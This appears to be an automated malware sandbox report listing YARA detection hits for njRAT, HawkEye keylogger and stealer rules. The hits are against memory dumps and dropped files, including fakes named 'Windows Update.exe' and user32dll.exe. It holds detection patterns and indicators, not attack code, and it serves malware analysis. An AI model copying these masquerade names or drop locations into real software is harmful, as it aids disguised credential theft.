                  Source: 16.2.RedLine.exe.2700000.1.raw.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                  Source: 16.2.RedLine.exe.2700000.1.raw.unpack, type: UNPACKEDPEMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
                  Source: 17.0.Windows Update.exe.d9fa72.9.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 17.0.Windows Update.exe.d9fa72.9.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 17.0.Windows Update.exe.d49c0d.1.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 17.0.Windows Update.exe.d49c0d.1.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 17.0.Windows Update.exe.d49c0d.11.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 17.0.Windows Update.exe.d49c0d.11.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 17.0.Windows Update.exe.d40000.4.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 17.0.Windows Update.exe.d40000.4.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 17.0.Windows Update.exe.d40000.4.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 2.0.Keylogger.exe.769c0d.1.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 2.0.Keylogger.exe.769c0d.1.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 17.0.Windows Update.exe.d40000.12.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 17.0.Windows Update.exe.d40000.12.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 17.0.Windows Update.exe.d40000.12.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 2.2.Keylogger.exe.760000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 2.2.Keylogger.exe.760000.0.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 2.2.Keylogger.exe.760000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 17.2.Windows Update.exe.33faa98.4.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 17.2.Windows Update.exe.33faa98.4.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 17.2.Windows Update.exe.33faa98.4.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 0000002A.00000002.490818765.0000000002EA1000.00000004.00000001.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                  Source: 0000002A.00000002.490818765.0000000002EA1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
                  Source: 00000028.00000002.461183087.0000000000B02000.00000002.00020000.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 00000028.00000002.461183087.0000000000B02000.00000002.00020000.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 00000022.00000002.460848822.0000000002831000.00000004.00000001.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                  Source: 00000022.00000002.460848822.0000000002831000.00000004.00000001.sdmp, type: MEMORYMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
                  Source: 00000021.00000002.442088450.0000000000BC2000.00000002.00020000.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 00000021.00000002.442088450.0000000000BC2000.00000002.00020000.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 00000004.00000002.344112668.0000000002630000.00000004.00020000.sdmp, type: MEMORYMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 00000004.00000002.344112668.0000000002630000.00000004.00020000.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                  Source: 00000004.00000002.344112668.0000000002630000.00000004.00020000.sdmp, type: MEMORYMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
                  Source: 00000010.00000002.569953826.0000000002A81000.00000004.00000001.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                  Source: 00000010.00000002.569953826.0000000002A81000.00000004.00000001.sdmp, type: MEMORYMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
                  Source: 00000028.00000000.452870911.0000000000B02000.00000002.00020000.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 00000028.00000000.452870911.0000000000B02000.00000002.00020000.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 00000004.00000002.344202284.0000000002AC1000.00000004.00000001.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                  Source: 00000004.00000002.344202284.0000000002AC1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
                  Source: 00000011.00000002.401022146.0000000003844000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 0000002A.00000002.490487625.0000000002AD0000.00000004.00020000.sdmp, type: MEMORYMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 0000002A.00000002.490487625.0000000002AD0000.00000004.00020000.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                  Source: 0000002A.00000002.490487625.0000000002AD0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
                  Source: 00000022.00000002.460388443.00000000008F0000.00000004.00020000.sdmp, type: MEMORYMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 00000022.00000002.460388443.00000000008F0000.00000004.00020000.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                  Source: 00000022.00000002.460388443.00000000008F0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
                  Source: 00000023.00000002.517639660.0000000000D72000.00000002.00020000.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 00000023.00000002.517639660.0000000000D72000.00000002.00020000.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 00000011.00000002.398362779.00000000033D1000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 00000011.00000002.398362779.00000000033D1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 00000023.00000000.438271647.0000000000D72000.00000002.00020000.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 00000023.00000000.438271647.0000000000D72000.00000002.00020000.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 00000011.00000002.404757917.0000000007F20000.00000004.00020000.sdmp, type: MEMORYMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 00000011.00000000.344079662.0000000000D42000.00000002.00020000.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 00000011.00000000.344079662.0000000000D42000.00000002.00020000.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 00000011.00000000.345013885.0000000000D42000.00000002.00020000.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 00000011.00000000.345013885.0000000000D42000.00000002.00020000.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 00000023.00000000.439141750.0000000000D72000.00000002.00020000.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 00000023.00000000.439141750.0000000000D72000.00000002.00020000.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 00000011.00000002.395985311.0000000000D42000.00000002.00020000.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 00000011.00000002.395985311.0000000000D42000.00000002.00020000.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 00000002.00000002.345938091.0000000000762000.00000002.00020000.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 00000002.00000002.345938091.0000000000762000.00000002.00020000.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 00000005.00000002.339955429.0000000002861000.00000004.00000001.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                  Source: 00000005.00000002.339955429.0000000002861000.00000004.00000001.sdmp, type: MEMORYMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
                  Source: 00000011.00000002.404673570.0000000007D50000.00000004.00020000.sdmp, type: MEMORYMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 00000023.00000002.529100173.0000000008CA0000.00000004.00020000.sdmp, type: MEMORYMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 00000011.00000000.344577031.0000000000D42000.00000002.00020000.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 00000011.00000000.344577031.0000000000D42000.00000002.00020000.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 00000021.00000000.418565410.0000000000BC2000.00000002.00020000.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 00000021.00000000.418565410.0000000000BC2000.00000002.00020000.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 00000011.00000003.370310625.0000000006DFE000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 00000011.00000003.370310625.0000000006DFE000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 00000023.00000000.439708948.0000000000D72000.00000002.00020000.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 00000023.00000000.439708948.0000000000D72000.00000002.00020000.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 00000023.00000000.437787976.0000000000D72000.00000002.00020000.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 00000023.00000000.437787976.0000000000D72000.00000002.00020000.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 00000021.00000002.445241123.00000000013F3000.00000004.00000020.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 00000021.00000002.445241123.00000000013F3000.00000004.00000020.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 00000005.00000002.339619983.00000000024B0000.00000004.00020000.sdmp, type: MEMORYMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 00000005.00000002.339619983.00000000024B0000.00000004.00020000.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                  Source: 00000005.00000002.339619983.00000000024B0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
                  Source: 00000002.00000000.314643771.0000000000762000.00000002.00020000.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 00000002.00000000.314643771.0000000000762000.00000002.00020000.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 00000002.00000003.339296284.0000000000E97000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 00000002.00000003.339296284.0000000000E97000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 0000001E.00000002.421069475.0000000002C51000.00000004.00000001.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                  Source: 0000001E.00000002.421069475.0000000002C51000.00000004.00000001.sdmp, type: MEMORYMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
                  Source: 0000001E.00000002.420830260.0000000002620000.00000004.00020000.sdmp, type: MEMORYMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 0000001E.00000002.420830260.0000000002620000.00000004.00020000.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                  Source: 0000001E.00000002.420830260.0000000002620000.00000004.00020000.sdmp, type: MEMORYMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
                  Source: 00000023.00000002.521512355.00000000036C1000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 00000023.00000002.521512355.00000000036C1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 00000010.00000002.569803952.0000000002700000.00000004.00020000.sdmp, type: MEMORYMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 00000010.00000002.569803952.0000000002700000.00000004.00020000.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                  Source: 00000010.00000002.569803952.0000000002700000.00000004.00020000.sdmp, type: MEMORYMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
                  Source: 00000023.00000002.529114563.0000000008CB0000.00000004.00020000.sdmp, type: MEMORYMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 00000011.00000000.343560898.0000000000D42000.00000002.00020000.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 00000011.00000000.343560898.0000000000D42000.00000002.00020000.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exe, type: DROPPEDMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exe, type: DROPPEDMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exe, type: DROPPEDMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exe, type: DROPPEDMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exe, type: DROPPEDMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exe, type: DROPPEDMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe, type: DROPPEDMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe, type: DROPPEDMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe, type: DROPPEDMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: C:\Users\user\AppData\Local\Temp\ViRuS.exeFile created: C:\Windows\SysWOW64\user32dll.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 00442A90 appears 36 times
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 004141D6 appears 88 times
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 00413F8E appears 66 times
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 00413E2D appears 34 times
